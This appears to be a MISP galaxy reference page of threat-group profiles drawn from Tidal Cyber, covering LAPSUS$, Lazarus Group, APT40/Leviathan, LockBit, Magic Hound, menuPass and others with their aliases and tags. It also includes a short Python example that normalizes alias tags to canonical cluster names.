[LAPSUS$](https://app.tidalcyber.com/groups/0060bb76-6713-4942-a4c0-d4ae01ec2866) is a cybercriminal threat group that has been active since at least mid-2021. [LAPSUS$](https://app.tidalcyber.com/groups/0060bb76-6713-4942-a4c0-d4ae01ec2866) specializes in large-scale social engineering and extortion operations, including destructive attacks without the use of ransomware. The group has targeted organizations globally, including in the government, manufacturing, higher education, energy, healthcare, technology, telecommunications, and media sectors.<sup>[[BBC LAPSUS Apr 2022](https://app.tidalcyber.com/references/6c9f4312-6c9d-401c-b20f-12ce50c94a96)]</sup><sup>[[MSTIC DEV-0537 Mar 2022](https://app.tidalcyber.com/references/a9ce7e34-6e7d-4681-9869-8e8f2b5b0390)]</sup><sup>[[UNIT 42 LAPSUS Mar 2022](https://app.tidalcyber.com/references/50f4c1ed-b046-405a-963d-a113324355a3)]</sup>

The tag is: misp-galaxy:groups="LAPSUS$"

HIDDEN COBRA - Associated Group

The U.S. Government refers to malicious cyber activity by the North Korean government as HIDDEN COBRA.<sup>[[US-CERT HIDDEN COBRA June 2017](https://app.tidalcyber.com/references/8e57cea3-ee37-4507-bb56-7445050ec8ca)]</sup><sup>[[US-CERT HOPLIGHT Apr 2019](https://app.tidalcyber.com/references/e722b71b-9042-4143-a156-489783d86e0a)]</sup>

The tag is: misp-galaxy:groups="HIDDEN COBRA - Associated Group"

Labyrinth Chollima - Associated Group

<sup>[[CrowdStrike Labyrinth Chollima Feb 2022](https://app.tidalcyber.com/references/ffe31bbf-a40d-4285-96a0-53c54298a680)]</sup>

The tag is: misp-galaxy:groups="Labyrinth Chollima - Associated Group"

Guardians of Peace - Associated Group

The tag is: misp-galaxy:groups="Guardians of Peace - Associated Group"

ZINC - Associated Group

<sup>[[Microsoft ZINC disruption Dec 2017](https://app.tidalcyber.com/references/99831838-fc8f-43fa-9c87-6ccdf5677c34)]</sup>

The tag is: misp-galaxy:groups="ZINC - Associated Group"

NICKEL ACADEMY - Associated Group

<sup>[[Secureworks NICKEL ACADEMY Dec 2017](https://app.tidalcyber.com/references/aa7393ad-0760-4f27-a068-17beba17bbe3)]</sup>

The tag is: misp-galaxy:groups="NICKEL ACADEMY - Associated Group"

Diamond Sleet - Associated Group

The tag is: misp-galaxy:groups="Diamond Sleet - Associated Group"

Lazarus Group

[Lazarus Group](https://app.tidalcyber.com/groups/0bc66e95-de93-4de7-b415-4041b7191f08) is a North Korean state-sponsored cyber threat group that has been attributed to the Reconnaissance General Bureau.<sup>[[US-CERT HIDDEN COBRA June 2017](https://app.tidalcyber.com/references/8e57cea3-ee37-4507-bb56-7445050ec8ca)]</sup><sup>[[Treasury North Korean Cyber Groups September 2019](https://app.tidalcyber.com/references/54977bb2-2929-41d7-bdea-06d39dc76174)]</sup> The group has been active since at least 2009 and was reportedly responsible for the November 2014 destructive wiper attack against Sony Pictures Entertainment as part of a campaign named Operation Blockbuster by Novetta. Malware used by [Lazarus Group](https://app.tidalcyber.com/groups/0bc66e95-de93-4de7-b415-4041b7191f08) correlates to other reported campaigns, including Operation Flame, Operation 1Mission, Operation Troy, DarkSeoul, and Ten Days of Rain. <sup>[[Novetta Blockbuster](https://app.tidalcyber.com/references/bde96b4f-5f98-4ce5-a507-4b05d192b6d7)]</sup>

North Korean group definitions are known to have significant overlap, and some security researchers report all North Korean state-sponsored cyber activity under the name [Lazarus Group](https://app.tidalcyber.com/groups/0bc66e95-de93-4de7-b415-4041b7191f08) instead of tracking clusters or subgroups, such as [Andariel](https://app.tidalcyber.com/groups/2cc997b5-5076-4eef-9974-f54387614f46), [APT37](https://app.tidalcyber.com/groups/013fdfdc-aa32-4779-8f6e-7920615cbf66), [APT38](https://app.tidalcyber.com/groups/dfbce236-735c-436d-b433-933bd6eae17b), and [Kimsuky](https://app.tidalcyber.com/groups/37f317d8-02f0-43d4-8a7d-7a65ce8aadf1).

The tag is: misp-galaxy:groups="Lazarus Group"
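The overlap noted above matters in practice: the same North Korean activity may arrive tagged as `HIDDEN COBRA`, `ZINC`, `Labyrinth Chollima` or `Lazarus Group`, and an analyst correlating events needs to collapse those to one cluster. The example below is added here and is not MISP project code; it parses the `The tag is: misp-galaxy:groups="..."` lines of a page laid out like this one, builds an alias map from the `- Associated Group` entries, and normalizes a set of event tags to canonical cluster names. It assumes the layout used by this generated document, namely that each cluster's associated-group entries are listed immediately before the cluster itself; the sample text is constructed for the example.

```python
import re

# Constructed sample laid out like this generated galaxy page
# (headings, "The tag is:" lines); not copied from the MISP galaxy JSON.
SAMPLE = """\
HIDDEN COBRA - Associated Group

The U.S. Government refers to malicious cyber activity by the North Korean government as HIDDEN COBRA.

The tag is: misp-galaxy:groups="HIDDEN COBRA - Associated Group"

ZINC - Associated Group

The tag is: misp-galaxy:groups="ZINC - Associated Group"

Lazarus Group

Lazarus Group is a North Korean state-sponsored cyber threat group.

The tag is: misp-galaxy:groups="Lazarus Group"

Thallium - Associated Group

The tag is: misp-galaxy:groups="Thallium - Associated Group"

Kimsuky

Kimsuky is a North Korea-based cyber espionage group.

The tag is: misp-galaxy:groups="Kimsuky"
"""

# Matches the tag lines this page uses, e.g. misp-galaxy:groups="Lazarus Group"
TAG_LINE_RE = re.compile(r'^The tag is: misp-galaxy:(?P<galaxy>[\w-]+)="(?P<value>.+)"$')
EVENT_TAG_RE = re.compile(r'^misp-galaxy:groups="(?P<value>.+)"$')
ASSOC_SUFFIX = " - Associated Group"


def build_alias_map(text):
    """Map each alias (from '<alias> - Associated Group') to the canonical
    cluster it precedes. Assumption (how this generated page is laid out):
    associated-group entries come right before their canonical cluster, so
    pending aliases are attached to the next non-alias tag that appears."""
    aliases = {}
    pending = []
    for line in text.splitlines():
        m = TAG_LINE_RE.match(line.strip())
        if not m or m.group("galaxy") != "groups":
            continue
        value = m.group("value")
        if value.endswith(ASSOC_SUFFIX):
            pending.append(value[: -len(ASSOC_SUFFIX)])
        else:
            for alias in pending:
                aliases[alias] = value
            aliases[value] = value  # a canonical name resolves to itself
            pending = []
    return aliases


def normalize_tags(tags, aliases):
    """Resolve the misp-galaxy:groups tags on an event to canonical cluster
    names. Tags from other namespaces (tlp:, etc.) and unknown group values
    are kept unchanged so nothing is silently dropped."""
    canonical = set()
    for tag in tags:
        m = EVENT_TAG_RE.match(tag)
        if not m:
            canonical.add(tag)
            continue
        value = m.group("value")
        name = value[: -len(ASSOC_SUFFIX)] if value.endswith(ASSOC_SUFFIX) else value
        canonical.add(aliases.get(name, value))
    return canonical


if __name__ == "__main__":
    alias_map = build_alias_map(SAMPLE)
    event_tags = [
        'misp-galaxy:groups="ZINC - Associated Group"',
        'misp-galaxy:groups="HIDDEN COBRA - Associated Group"',
        'tlp:amber',
    ]
    print(sorted(normalize_tags(event_tags, alias_map)))  # ['Lazarus Group', 'tlp:amber']
```

Because the alias map is derived from the page rather than hard-coded, re-running `build_alias_map` over a newer export picks up renamed or added associated groups (for example a new Microsoft naming such as `Diamond Sleet`) without code changes; the one thing to keep verifying is the layout assumption, since a galaxy exported in a different order would attach aliases to the wrong cluster.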

LazyScripter

[LazyScripter](https://app.tidalcyber.com/groups/12279b62-289e-49ee-97cb-c780edd3d091) is a threat group that has mainly targeted the airline industry since at least 2018, primarily using open-source toolsets.<sup>[[MalwareBytes LazyScripter Feb 2021](https://app.tidalcyber.com/references/078837a7-82cd-4e26-9135-43b612e911fe)]</sup>

The tag is: misp-galaxy:groups="LazyScripter"

Raspite - Associated Group

The tag is: misp-galaxy:groups="Raspite - Associated Group"

Leafminer

[Leafminer](https://app.tidalcyber.com/groups/b5c28235-d441-40d9-8da2-d49ba2f2568b) is an Iranian threat group that has targeted government organizations and business entities in the Middle East since at least early 2017. <sup>[[Symantec Leafminer July 2018](https://app.tidalcyber.com/references/01130af7-a2d4-435e-8790-49933e041451)]</sup>

The tag is: misp-galaxy:groups="Leafminer"

Kryptonite Panda - Associated Group

<sup>[[CISA AA21-200A APT40 July 2021](https://app.tidalcyber.com/references/3a2dbd8b-54e3-406a-b77c-b6fae5541b6d)]</sup><sup>[[Crowdstrike KRYPTONITE PANDA August 2018](https://app.tidalcyber.com/references/42fe94f5-bc4c-4b0b-9c35-0bc32cbc5d79)]</sup>

The tag is: misp-galaxy:groups="Kryptonite Panda - Associated Group"

BRONZE MOHAWK - Associated Group

The tag is: misp-galaxy:groups="BRONZE MOHAWK - Associated Group"

APT40 - Associated Group

FireEye reporting on TEMP.Periscope (which was combined into APT40) indicated TEMP.Periscope was reported upon as Leviathan.<sup>[[CISA AA21-200A APT40 July 2021](https://app.tidalcyber.com/references/3a2dbd8b-54e3-406a-b77c-b6fae5541b6d)]</sup><sup>[[Proofpoint Leviathan Oct 2017](https://app.tidalcyber.com/references/f8c2b67b-c097-4b48-8d95-266a45b7dd4d)]</sup><sup>[[FireEye Periscope March 2018](https://app.tidalcyber.com/references/8edb5d2b-b5c4-4d9d-8049-43dd6ca9ab7f)]</sup><sup>[[FireEye APT40 March 2019](https://app.tidalcyber.com/references/8a44368f-3348-4817-aca7-81bfaca5ae6d)]</sup>

The tag is: misp-galaxy:groups="APT40 - Associated Group"

MUDCARP - Associated Group

The tag is: misp-galaxy:groups="MUDCARP - Associated Group"

Gadolinium - Associated Group

The tag is: misp-galaxy:groups="Gadolinium - Associated Group"

TEMP.Jumper - Associated Group

[Leviathan](https://app.tidalcyber.com/groups/eadd78e3-3b5d-430a-b994-4360b172c871) was previously reported upon by FireEye as TEMP.Periscope and TEMP.Jumper.<sup>[[CISA AA21-200A APT40 July 2021](https://app.tidalcyber.com/references/3a2dbd8b-54e3-406a-b77c-b6fae5541b6d)]</sup><sup>[[FireEye APT40 March 2019](https://app.tidalcyber.com/references/8a44368f-3348-4817-aca7-81bfaca5ae6d)]</sup>

The tag is: misp-galaxy:groups="TEMP.Jumper - Associated Group"

TEMP.Periscope - Associated Group

[Leviathan](https://app.tidalcyber.com/groups/eadd78e3-3b5d-430a-b994-4360b172c871) was previously reported upon by FireEye as TEMP.Periscope and TEMP.Jumper.<sup>[[CISA AA21-200A APT40 July 2021](https://app.tidalcyber.com/references/3a2dbd8b-54e3-406a-b77c-b6fae5541b6d)]</sup><sup>[[FireEye Periscope March 2018](https://app.tidalcyber.com/references/8edb5d2b-b5c4-4d9d-8049-43dd6ca9ab7f)]</sup><sup>[[FireEye APT40 March 2019](https://app.tidalcyber.com/references/8a44368f-3348-4817-aca7-81bfaca5ae6d)]</sup>

The tag is: misp-galaxy:groups="TEMP.Periscope - Associated Group"

Leviathan

[Leviathan](https://app.tidalcyber.com/groups/eadd78e3-3b5d-430a-b994-4360b172c871) is a Chinese state-sponsored cyber espionage group that has been attributed to the Ministry of State Security’s (MSS) Hainan State Security Department and an affiliated front company.<sup>[[CISA AA21-200A APT40 July 2021](https://app.tidalcyber.com/references/3a2dbd8b-54e3-406a-b77c-b6fae5541b6d)]</sup> Active since at least 2009, [Leviathan](https://app.tidalcyber.com/groups/eadd78e3-3b5d-430a-b994-4360b172c871) has targeted the following sectors: academia, aerospace/aviation, biomedical, defense industrial base, government, healthcare, manufacturing, maritime, and transportation across the US, Canada, Europe, the Middle East, and Southeast Asia.<sup>[[CISA AA21-200A APT40 July 2021](https://app.tidalcyber.com/references/3a2dbd8b-54e3-406a-b77c-b6fae5541b6d)]</sup><sup>[[Proofpoint Leviathan Oct 2017](https://app.tidalcyber.com/references/f8c2b67b-c097-4b48-8d95-266a45b7dd4d)]</sup><sup>[[FireEye Periscope March 2018](https://app.tidalcyber.com/references/8edb5d2b-b5c4-4d9d-8049-43dd6ca9ab7f)]</sup>

The tag is: misp-galaxy:groups="Leviathan"

Water Selkie - Associated Group

<sup>[[Trend Micro LockBit Spotlight February 08 2023](/references/f72dade0-ec82-40e7-96a0-9f124d59bd35)]</sup>

The tag is: misp-galaxy:groups="Water Selkie - Associated Group"

LockBit Ransomware Actors & Affiliates

This object represents the LockBit Ransomware-as-a-Service ("RaaS") apex group and the behaviors associated with its various affiliate ransomware operators. Specific affiliate operations defined by the research community will be tracked as separate objects.

Ransomware labeled "LockBit" was first observed in 2020. LockBit developers have introduced multiple versions of the LockBit encryption tool. According to the U.S. Cybersecurity and Infrastructure Security Agency ("CISA"), the following major LockBit variants have been observed (first-observed dates in parentheses): ABCD (LockBit malware’s predecessor; September 2019), LockBit (January 2020), LockBit 2.0 (June 2021), LockBit Linux-ESXi Locker (October 2021), LockBit 3.0 (March 2022), LockBit Green (a variant that incorporates source code from Conti ransomware; January 2023), and variants capable of targeting macOS environments (April 2023). As of June 2023, CISA reported that the web panel that offers affiliates access to LockBit malware explicitly listed the LockBit 2.0, LockBit 3.0, LockBit Green, and LockBit Linux-ESXi Locker variants.<sup>[[U.S. CISA Understanding LockBit June 2023](/references/9c03b801-2ebe-4c7b-aa29-1b7a3625964a)]</sup>

Since emerging in 2020, the LockBit group and its affiliates have carried out a very large number of attacks involving a wide range of victims around the world. In June 2023, the U.S. Federal Bureau of Investigation reported it had identified 1,700 LockBit attacks since 2020.<sup>[[U.S. CISA Understanding LockBit June 2023](/references/9c03b801-2ebe-4c7b-aa29-1b7a3625964a)]</sup> According to data collected by the [ransomwatch project](https://github.com/joshhighet/ransomwatch) and analyzed by Tidal, LockBit actors publicly claimed 970 victims in 2022 (576 associated with the LockBit 2.0 variant and 394 associated with LockBit 3.0), the most of any extortion threat that year. Through April 2023, LockBit had claimed 406 victims, more than double the number of the next threat (Clop, with 179 victims).<sup>[[GitHub ransomwatch](/references/62037959-58e4-475a-bb91-ff360d20c1d7)]</sup> CISA reported in June 2023 that U.S. ransoms paid to LockBit since January 2020 totaled $91 million.<sup>[[U.S. CISA Understanding LockBit June 2023](/references/9c03b801-2ebe-4c7b-aa29-1b7a3625964a)]</sup>

LockBit affiliate operators are known to use a wide variety of techniques during their attacks. Initial access for LockBit infections has occurred via a wide range of methods (including a number of vulnerability exploits), and operators are known to abuse a range of free and open-source software tools for a variety of post-exploitation activities. In addition to encrypting victim data, LockBit actors routinely exfiltrate victim data and threaten to leak it for extortion purposes.

Related Vulnerabilities: CVE-2021-22986, CVE-2023-0669, CVE-2023-27350, CVE-2021-44228, CVE-2020-1472, CVE-2019-0708, CVE-2018-13379<sup>[[U.S. CISA Understanding LockBit June 2023](/references/9c03b801-2ebe-4c7b-aa29-1b7a3625964a)]</sup>

The tag is: misp-galaxy:groups="LockBit Ransomware Actors & Affiliates"

Spring Dragon - Associated Group

The tag is: misp-galaxy:groups="Spring Dragon - Associated Group"

DRAGONFISH - Associated Group

The tag is: misp-galaxy:groups="DRAGONFISH - Associated Group"

Lotus Blossom

[Lotus Blossom](https://app.tidalcyber.com/groups/2849455a-cf39-4a9f-bd89-c2b3c1e5dd52) is a threat group that has targeted government and military organizations in Southeast Asia. <sup>[[Lotus Blossom Jun 2015](https://app.tidalcyber.com/references/46fdb8ca-b14d-43bd-a20f-cae7b26e56c6)]</sup>

The tag is: misp-galaxy:groups="Lotus Blossom"

LuminousMoth

[LuminousMoth](https://app.tidalcyber.com/groups/b10aa4c0-10a1-5e08-8d9d-82ce95d45e6a) is a Chinese-speaking cyber espionage group that has been active since at least October 2020. [LuminousMoth](https://app.tidalcyber.com/groups/b10aa4c0-10a1-5e08-8d9d-82ce95d45e6a) has targeted high-profile organizations, including government entities, in Myanmar, the Philippines, Thailand, and other parts of Southeast Asia. Some security researchers have concluded there is a connection between [LuminousMoth](https://app.tidalcyber.com/groups/b10aa4c0-10a1-5e08-8d9d-82ce95d45e6a) and [Mustang Panda](https://app.tidalcyber.com/groups/4a4641b1-7686-49da-8d83-00d8013f4b47) based on similar targeting and TTPs, as well as network infrastructure overlaps.<sup>[[Kaspersky LuminousMoth July 2021](https://app.tidalcyber.com/references/e21c6931-fba8-52b0-b6f0-1c8222881fbd)]</sup><sup>[[Bitdefender LuminousMoth July 2021](https://app.tidalcyber.com/references/6b1ce8bb-4e77-59f3-87ff-78f4a1a10ad3)]</sup>

The tag is: misp-galaxy:groups="LuminousMoth"

APT-C-43 - Associated Group

The tag is: misp-galaxy:groups="APT-C-43 - Associated Group"

El Machete - Associated Group

The tag is: misp-galaxy:groups="El Machete - Associated Group"

Machete

[Machete](https://app.tidalcyber.com/groups/a3be79a2-3d4f-4697-a8a1-83f0884220af) is a suspected Spanish-speaking cyber espionage group that has been active since at least 2010. It has primarily focused its operations within Latin America, with a particular emphasis on Venezuela, but also in the US, Europe, Russia, and parts of Asia. [Machete](https://app.tidalcyber.com/groups/a3be79a2-3d4f-4697-a8a1-83f0884220af) generally targets high-profile organizations such as government institutions, intelligence services, and military units, as well as telecommunications and power companies.<sup>[[Cylance Machete Mar 2017](https://app.tidalcyber.com/references/92a9a311-1e0b-4819-9856-2dfc8dbfc08d)]</sup><sup>[[Securelist Machete Aug 2014](https://app.tidalcyber.com/references/fc7be240-bd15-4ec4-bc01-f8891d7210d9)]</sup><sup>[[ESET Machete July 2019](https://app.tidalcyber.com/references/408d5e33-fcb6-4d21-8be9-7aa5a8bd3385)]</sup><sup>[[360 Machete Sep 2020](https://app.tidalcyber.com/references/682c843d-1bb8-4f30-9d2e-35e8d41b1976)]</sup>

The tag is: misp-galaxy:groups="Machete"

Phosphorus - Associated Group

<sup>[[Microsoft Phosphorus Mar 2019](https://app.tidalcyber.com/references/c55a112d-4b05-4c32-a5b3-480b12929115)]</sup><sup>[[Microsoft Phosphorus Oct 2020](https://app.tidalcyber.com/references/8986c21c-16a0-4a53-8e37-9935bbbfaa4b)]</sup><sup>[[US District Court of DC Phosphorus Complaint 2019](https://app.tidalcyber.com/references/8f73a709-fb7e-4d9e-9743-4ba39ea26ea8)]</sup><sup>[[Certfa Charming Kitten January 2021](https://app.tidalcyber.com/references/c38a8af6-3f9b-40c3-8122-a2a51eb50664)]</sup><sup>[[Proofpoint TA453 March 2021](https://app.tidalcyber.com/references/5ba4217c-813b-4cc5-b694-3a4dcad776e4)]</sup><sup>[[Check Point APT35 CharmPower January 2022](https://app.tidalcyber.com/references/81dce660-93ea-42a4-902f-0c6021d30f59)]</sup>

The tag is: misp-galaxy:groups="Phosphorus - Associated Group"

TA453 - Associated Group

The tag is: misp-galaxy:groups="TA453 - Associated Group"

Charming Kitten - Associated Group

<sup>[[ClearSky Charming Kitten Dec 2017](https://app.tidalcyber.com/references/23ab1ad2-e9d4-416a-926f-6220a59044ab)]</sup><sup>[[Eweek Newscaster and Charming Kitten May 2014](https://app.tidalcyber.com/references/a3407cd2-d579-4d64-8f2e-162c31a99534)]</sup><sup>[[ClearSky Kittens Back 2 Oct 2019](https://app.tidalcyber.com/references/f5114978-2528-4199-a586-0158c5f8a138)]</sup><sup>[[ClearSky Kittens Back 3 August 2020](https://app.tidalcyber.com/references/a10c6a53-79bb-4454-b444-cfb9136ecd36)]</sup><sup>[[Proofpoint TA453 March 2021](https://app.tidalcyber.com/references/5ba4217c-813b-4cc5-b694-3a4dcad776e4)]</sup><sup>[[Check Point APT35 CharmPower January 2022](https://app.tidalcyber.com/references/81dce660-93ea-42a4-902f-0c6021d30f59)]</sup>

The tag is: misp-galaxy:groups="Charming Kitten - Associated Group"

Newscaster - Associated Group

Link analysis of infrastructure and tools revealed a potential relationship between Magic Hound and the older attack campaign called Newscaster (aka Newscasters).<sup>[[Unit 42 Magic Hound Feb 2017](https://app.tidalcyber.com/references/f1ef9868-3ddb-4289-aa92-481c35517920)]</sup><sup>[[FireEye APT35 2018](https://app.tidalcyber.com/references/71d3db50-4a20-4d8e-a640-4670d642205c)]</sup>

The tag is: misp-galaxy:groups="Newscaster - Associated Group"

COBALT ILLUSION - Associated Group

<sup>[[Secureworks COBALT ILLUSION Threat Profile](https://app.tidalcyber.com/references/8d9a5b77-2516-4ad5-9710-4c8165df2882)]</sup>

The tag is: misp-galaxy:groups="COBALT ILLUSION - Associated Group"

ITG18 - Associated Group

The tag is: misp-galaxy:groups="ITG18 - Associated Group"

APT35 - Associated Group

The tag is: misp-galaxy:groups="APT35 - Associated Group"

Magic Hound

[Magic Hound](https://app.tidalcyber.com/groups/7a9d653c-8812-4b96-81d1-b0a27ca918b4) is an Iranian-sponsored threat group that conducts long term, resource-intensive cyber espionage operations, likely on behalf of the Islamic Revolutionary Guard Corps. They have targeted European, U.S., and Middle Eastern government and military personnel, academics, journalists, and organizations such as the World Health Organization (WHO), via complex social engineering campaigns since at least 2014.<sup>[[FireEye APT35 2018](https://app.tidalcyber.com/references/71d3db50-4a20-4d8e-a640-4670d642205c)]</sup><sup>[[ClearSky Kittens Back 3 August 2020](https://app.tidalcyber.com/references/a10c6a53-79bb-4454-b444-cfb9136ecd36)]</sup><sup>[[Certfa Charming Kitten January 2021](https://app.tidalcyber.com/references/c38a8af6-3f9b-40c3-8122-a2a51eb50664)]</sup><sup>[[Secureworks COBALT ILLUSION Threat Profile](https://app.tidalcyber.com/references/8d9a5b77-2516-4ad5-9710-4c8165df2882)]</sup><sup>[[Proofpoint TA453 July2021](https://app.tidalcyber.com/references/a987872f-2176-437c-a38f-58676b7b12de)]</sup>

The tag is: misp-galaxy:groups="Magic Hound"

MedusaLocker Ransomware Actors

MedusaLocker is a ransomware-as-a-service ("RaaS") operation that has been active since September 2019. U.S. cybersecurity authorities indicate that MedusaLocker operators have primarily targeted victims in the healthcare sector, among other unspecified sectors. Initial access for MedusaLocker intrusions originally came via phishing and spam email campaigns, but since 2022 it has typically occurred via exploitation of vulnerable Remote Desktop Protocol (RDP) devices.<sup>[[HC3 Analyst Note MedusaLocker Ransomware February 2023](/references/49e314d6-5324-41e0-8bee-2b3e08d5e12f)]</sup>

This object represents behaviors associated with operators of MedusaLocker ransomware. As MedusaLocker is licensed on a RaaS model, affiliates likely do not act as a single cohesive unit, and behaviors observed during particular attacks may vary. Behaviors associated with samples of MedusaLocker ransomware are represented in the "MedusaLocker Ransomware" Software object.

The tag is: misp-galaxy:groups="MedusaLocker Ransomware Actors"

Medusa Ransomware Actors

Medusa is a ransomware operation that reportedly launched in June 2021. In 2023, the group launched a website used to publicize alleged victims. The group appears to be independent of the similarly named "MedusaLocker" operation.<sup>[[Bleeping Computer Medusa Ransomware March 12 2023](/references/21fe1d9e-17f1-49e2-b05f-78e9160f5414)]</sup>

According to data collected by the [ransomwatch project](https://github.com/joshhighet/ransomwatch) and analyzed by Tidal, Medusa actors publicly claimed around 90 victims through September 2023, ranking it ninth out of the 50+ ransomware operations in the dataset. These victims come from a wide variety of industry sectors and localities.<sup>[[GitHub ransomwatch](/references/62037959-58e4-475a-bb91-ff360d20c1d7)]</sup>

The tag is: misp-galaxy:groups="Medusa Ransomware Actors"

Stone Panda - Associated Group

The tag is: misp-galaxy:groups="Stone Panda - Associated Group"

CVNX - Associated Group

<sup>[[PWC Cloud Hopper April 2017](https://app.tidalcyber.com/references/fe741064-8cd7-428b-bdb9-9f2ab7e92489)]</sup><sup>[[DOJ APT10 Dec 2018](https://app.tidalcyber.com/references/3ddc68b4-53f1-4fa5-b7f3-4e5d7d9661f2)]</sup><sup>[[District Court of NY APT10 Indictment December 2018](https://app.tidalcyber.com/references/79ccbc74-b9c4-4dc8-91ae-1d15c4db563b)]</sup>

The tag is: misp-galaxy:groups="CVNX - Associated Group"

Cicada - Associated Group

The tag is: misp-galaxy:groups="Cicada - Associated Group"

POTASSIUM - Associated Group

<sup>[[DOJ APT10 Dec 2018](https://app.tidalcyber.com/references/3ddc68b4-53f1-4fa5-b7f3-4e5d7d9661f2)]</sup><sup>[[District Court of NY APT10 Indictment December 2018](https://app.tidalcyber.com/references/79ccbc74-b9c4-4dc8-91ae-1d15c4db563b)]</sup>

The tag is: misp-galaxy:groups="POTASSIUM - Associated Group"

APT10 - Associated Group

The tag is: misp-galaxy:groups="APT10 - Associated Group"

Red Apollo - Associated Group

<sup>[[PWC Cloud Hopper April 2017](https://app.tidalcyber.com/references/fe741064-8cd7-428b-bdb9-9f2ab7e92489)]</sup><sup>[[DOJ APT10 Dec 2018](https://app.tidalcyber.com/references/3ddc68b4-53f1-4fa5-b7f3-4e5d7d9661f2)]</sup><sup>[[District Court of NY APT10 Indictment December 2018](https://app.tidalcyber.com/references/79ccbc74-b9c4-4dc8-91ae-1d15c4db563b)]</sup>

The tag is: misp-galaxy:groups="Red Apollo - Associated Group"

HOGFISH - Associated Group

The tag is: misp-galaxy:groups="HOGFISH - Associated Group"

menuPass

[menuPass](https://app.tidalcyber.com/groups/fb93231d-2ae4-45da-9dea-4c372a11f322) is a threat group that has been active since at least 2006. Individual members of [menuPass](https://app.tidalcyber.com/groups/fb93231d-2ae4-45da-9dea-4c372a11f322) are known to have acted in association with the Chinese Ministry of State Security’s (MSS) Tianjin State Security Bureau and worked for the Huaying Haitai Science and Technology Development Company.<sup>[[DOJ APT10 Dec 2018](https://app.tidalcyber.com/references/3ddc68b4-53f1-4fa5-b7f3-4e5d7d9661f2)]</sup><sup>[[District Court of NY APT10 Indictment December 2018](https://app.tidalcyber.com/references/79ccbc74-b9c4-4dc8-91ae-1d15c4db563b)]</sup>

[menuPass](https://app.tidalcyber.com/groups/fb93231d-2ae4-45da-9dea-4c372a11f322) has targeted healthcare, defense, aerospace, finance, maritime, biotechnology, energy, and government sectors globally, with an emphasis on Japanese organizations. In 2016 and 2017, the group is known to have targeted managed IT service providers (MSPs), manufacturing and mining companies, and a university.<sup>[[Palo Alto menuPass Feb 2017](https://app.tidalcyber.com/references/ba4f7d65-73ec-4726-b1f6-f2443ffda5e7)]</sup><sup>[[Crowdstrike CrowdCast Oct 2013](https://app.tidalcyber.com/references/2062a229-58b3-4610-99cb-8907e7fbb350)]</sup><sup>[[FireEye Poison Ivy](https://app.tidalcyber.com/references/c189447e-a903-4dc2-a38b-1f4accc64e20)]</sup><sup>[[PWC Cloud Hopper April 2017](https://app.tidalcyber.com/references/fe741064-8cd7-428b-bdb9-9f2ab7e92489)]</sup><sup>[[FireEye APT10 April 2017](https://app.tidalcyber.com/references/2d494df8-83e3-45d2-b798-4c3bcf55f675)]</sup><sup>[[DOJ APT10 Dec 2018](https://app.tidalcyber.com/references/3ddc68b4-53f1-4fa5-b7f3-4e5d7d9661f2)]</sup><sup>[[District Court of NY APT10 Indictment December 2018](https://app.tidalcyber.com/references/79ccbc74-b9c4-4dc8-91ae-1d15c4db563b)]</sup>

The tag is: misp-galaxy:groups="menuPass"

Metador

[Metador](https://app.tidalcyber.com/groups/a3a3a1d3-7fe7-5578-8c5f-9c0f2f68079b) is a suspected cyber espionage group that was first reported in September 2022. [Metador](https://app.tidalcyber.com/groups/a3a3a1d3-7fe7-5578-8c5f-9c0f2f68079b) has targeted a limited number of telecommunication companies, internet service providers, and universities in the Middle East and Africa. Security researchers named the group [Metador](https://app.tidalcyber.com/groups/a3a3a1d3-7fe7-5578-8c5f-9c0f2f68079b) based on the "I am meta" string in one of the group’s malware samples and the expectation of Spanish-language responses from C2 servers.<sup>[[SentinelLabs Metador Sept 2022](https://app.tidalcyber.com/references/137474b7-638a-56d7-9ce2-ab906f207175)]</sup>

The tag is: misp-galaxy:groups="Metador"

Moafee

[Moafee](https://app.tidalcyber.com/groups/4510ce41-27b9-479c-9bf3-a328b77bae29) is a threat group that appears to operate from the Guangdong Province of China. Due to overlapping TTPs, including similar custom tools, Moafee is thought to have a direct or indirect relationship with the threat group [DragonOK](https://app.tidalcyber.com/groups/f2c2db08-624c-46b9-b7ed-b22c21b81813).<sup>[[Haq 2014](https://app.tidalcyber.com/references/4e10228d-d9da-4ba4-bca7-d3bbdce42e0d)]</sup>

The tag is: misp-galaxy:groups="Moafee"

Mofang

[Mofang](https://app.tidalcyber.com/groups/8bc69792-c26d-4493-87e3-d8e47605fed8) is a likely China-based cyber espionage group, named for its frequent practice of imitating a victim’s infrastructure. This adversary has been observed since at least May 2012 conducting focused attacks against government and critical infrastructure in Myanmar, as well as several other countries and sectors including military, automobile, and weapons industries.<sup>[[FOX-IT May 2016 Mofang](https://app.tidalcyber.com/references/f1a08b1c-f7d5-4a91-b3b7-0f042b297842)]</sup>

The tag is: misp-galaxy:groups="Mofang"

Operation Molerats - Associated Group

The tag is: misp-galaxy:groups="Operation Molerats - Associated Group"

Gaza Cybergang - Associated Group

The tag is: misp-galaxy:groups="Gaza Cybergang - Associated Group"

Molerats

[Molerats](https://app.tidalcyber.com/groups/679b7b6b-9659-4e56-9ffd-688a6fab01b6) is an Arabic-speaking, politically-motivated threat group that has been operating since 2012. The group’s victims have primarily been in the Middle East, Europe, and the United States.<sup>[[DustySky](https://app.tidalcyber.com/references/b9e0770d-f54a-4ada-abd1-65c45eee00fa)]</sup><sup>[[DustySky2](https://app.tidalcyber.com/references/4a3ecdec-254c-4eb4-9126-f540bb21dffe)]</sup><sup>[[Kaspersky MoleRATs April 2019](https://app.tidalcyber.com/references/38216a34-5ffd-4e79-80b1-7270743b728e)]</sup><sup>[[Cybereason Molerats Dec 2020](https://app.tidalcyber.com/references/81a10a4b-c66f-4526-882c-184436807e1d)]</sup>

The tag is: misp-galaxy:groups="Molerats"

Moses Staff

[Moses Staff](https://app.tidalcyber.com/groups/a41725c5-eb3a-4772-8d1e-17c3bbade79c) is a suspected Iranian threat group that has primarily targeted Israeli companies since at least September 2021. [Moses Staff](https://app.tidalcyber.com/groups/a41725c5-eb3a-4772-8d1e-17c3bbade79c) openly stated their motivation in attacking Israeli companies is to cause damage by leaking stolen sensitive data and encrypting the victim’s networks without a ransom demand.<sup>[[Checkpoint MosesStaff Nov 2021](https://app.tidalcyber.com/references/d6da2849-cff0-408a-9f09-81a33fc88a56)]</sup>

